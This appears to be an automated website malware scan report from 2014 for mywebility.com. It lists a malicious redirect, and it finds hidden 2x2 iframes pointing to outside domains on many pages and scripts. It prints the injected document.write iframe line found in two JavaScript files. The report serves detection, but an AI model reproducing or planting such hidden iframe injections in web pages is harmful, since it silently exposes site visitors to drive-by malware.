Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://mywebility.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: mywebility.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 21 Apr 2014 11:02:07 GMT Location: http://khenpo.ru/ohcd.html?h=504956 Server: Apache Content-Length: 283 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://mywebility.com/ | 200 OK Content-Length: 39642 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://mywebility.com/animatedcollapse.js | 200 OK Content-Length: 11921 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=504956 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=504956> Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://mywebility.com/stepcarousel.js | 200 OK Content-Length: 18562 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=504956 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=504956> Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://mywebility.com/ddaccordion.js | 200 OK Content-Length: 14630 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=504956 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=504956> | ||
http://mywebility.com/js/MagnonInternational.js | 200 OK Content-Length: 24422 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=504956 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=504956> | ||
http://mywebility.com/js/jquery1.js | 200 OK Content-Length: 57407 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=504956></iframe>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);i Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=504956 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=504956> | ||
http://mywebility.com/js/ddsmoothmenu.js | 200 OK Content-Length: 7774 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=504956></iframe>');
var ddsmoothmenu={ arrowimages: {down:['downarrowclass', 'images/down.gif',0], right:['rightarrowclass', 'images/rights.gif']}, transition: {overtime:300, outtime:300}, shadow: {enable:true, offsetx:5, offsety:5}, showhidedelay: {showdelay: 100, hidedelay: 200}, detectwebkit: navigator.userAgent.toLowerCase().ind +mainselector+' ul li a {background:'+setting.customtheme[0]+';}\n' +mainmenuid+' ul li a:hover {background:'+setting.customtheme[1]+';}\n' +'</style>') } this.shadow.enable=(document.all && !window.XMLHttpRequest)? false : this.shadow.enable jQuery(document).ready(function($){ if (typeof setting.contentsource=="object"){ ddsmoothmenu.getajaxmenu($, setting) } else{ ddsmoothmenu.buildmenu($, setting) } }) } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=504956 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=504956> | ||
http://mywebility.com/aboutus.php | 200 OK Content-Length: 22412 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://mywebility.com/services.php | 200 OK Content-Length: 21839 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://mywebility.com/web-design.php | 200 OK Content-Length: 23742 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://mywebility.com/search-engine-optimization.php | 200 OK Content-Length: 23032 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://mywebility.com/web-application-development.php | 200 OK Content-Length: 24832 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://mywebility.com/mobile-web-design.php | 200 OK Content-Length: 22268 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 28 websites. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mywebility.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mywebility.com/
Result: mywebility.com is not infected or malware details are not published yet.
Result: mywebility.com is not infected or malware details are not published yet.